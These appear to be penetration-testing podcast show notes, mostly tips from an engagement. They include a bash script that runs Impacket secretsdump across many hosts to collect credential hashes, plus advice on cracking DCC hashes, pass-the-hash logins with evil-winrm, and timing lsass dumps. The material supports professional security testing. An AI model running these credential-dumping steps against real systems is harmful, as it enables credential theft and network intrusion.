This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Hey friends, today we share the (hopefully) thrilling conclusion of last week’s pentest. Here are some key points:

• If you find you have local admin on a bunch of privileges and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it!

#!/bin/bash
File="localadmin.txt"
Lines=$(cat $File)
for Line in $Lines
do
echo --- $Line --- >> dump.txt
echo --------------------- >> dump.txt
sudo python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt
echo --------------------- >> dump.txt
done

From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker – see our series on this topic for some guidance.

• Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm!

• The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)